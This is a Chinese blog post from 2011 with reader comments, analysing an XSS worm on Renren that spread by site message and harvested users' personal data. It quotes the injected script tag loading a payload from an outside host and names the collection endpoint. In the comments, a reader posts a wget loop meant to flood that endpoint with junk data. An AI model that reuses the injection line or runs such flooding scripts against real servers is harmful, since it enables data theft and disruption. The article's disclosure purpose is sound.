除了说淫淫的程序员傻逼之外,还能说什么呢……
4月29日晚,大量人人网用户收到一个标题为《有人暗恋你哦,你想知道TA是谁么》的站内信,用户发现若打开此站内信将会自动将此站内信内容发给所有好友。
通过查看站内信网页源码,发现其中有一行代码为<script src=’http://qiutuan.net/2011/51.js>。显然,一个稍微有点网站编程常识的人都知道“<>”一类标签符号在显示的时候需要转义为普通文本防止浏览器执行,但人人网的转化方式为在用户发送端转化,若绕过此机制直接发送(如此js脚本中直接post站内信内容)则文本中包含的HTML均可被正常执行……
显然作者的意图并非只是恶作剧,通过查看连混淆都懒得做的代码,我们可以很清楚的看到其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,并且通过一个伟大的功能——通讯录,还可以得到所有好友名片中的上述信息……全部信息会发送到http://qiutuan.net/2011/log.php
由于此站内信的传播之广泛,目前只知道此域名几乎是针对性的使用并且托管在美国(因此不能上国外网站的阉割教育网用户也许幸免?),唯一能稍微解决此问题的方法是所有会写代码的人都写一个脚本随机生成数据去稀释被上传的数据,当然要在其收手前做完。
要知道,人人网的隐私保护做的一直没有山寨它的某网站好。
珍爱生命,远离淫淫。
本文出自 杨肉的演讲台,转载时请注明出处及相应链接。
本文永久链接: https://yangzhe1991.org/blog/2011/04/%e9%99%a4%e4%ba%86%e8%af%b4%e6%b7%ab%e6%b7%ab%e7%9a%84%e7%a8%8b%e5%ba%8f%e5%91%98%e5%82%bb%e9%80%bc%e4%b9%8b%e5%a4%96%ef%bc%8c%e8%bf%98%e8%83%bd%e8%af%b4%e4%bb%80%e4%b9%88%e5%91%a2/
或者也有知乎专栏可以关注,
7条评论
简单的。
懒得用py了,不过数据不够随机。。。
#!/bin/sh
for ((i=235198990;i<=234198990;i++))
do
wget -q "qiutuan.net/2011/log.php?type=self_info&id="$i"&name=%B2%D9%C4%E3%C2%E8&school=%B2%D9%C4%E3%C2%E8&birth=222222&qq=868888&msn=343434&mobile=434" -O /dev/null
done
有人说只要那个人记录了下insert的时间就可以过滤掉,哪怕有误伤……看来真确实没什么很好的方法了
没办法,我这个脚本的目的在于消耗服务器资源,并不是完全随机。
就算他记住了insert的时间了
那么从这个脚本开始后的所有记录他不人工分析别想得到了。
山寨它的某网站是哪个?是它山寨的某网站吧?
说的太清楚就没意思了……认真你就输了
而且淫淫网管理员获悉此事后第一件做的事果然是封杀言论
我党特色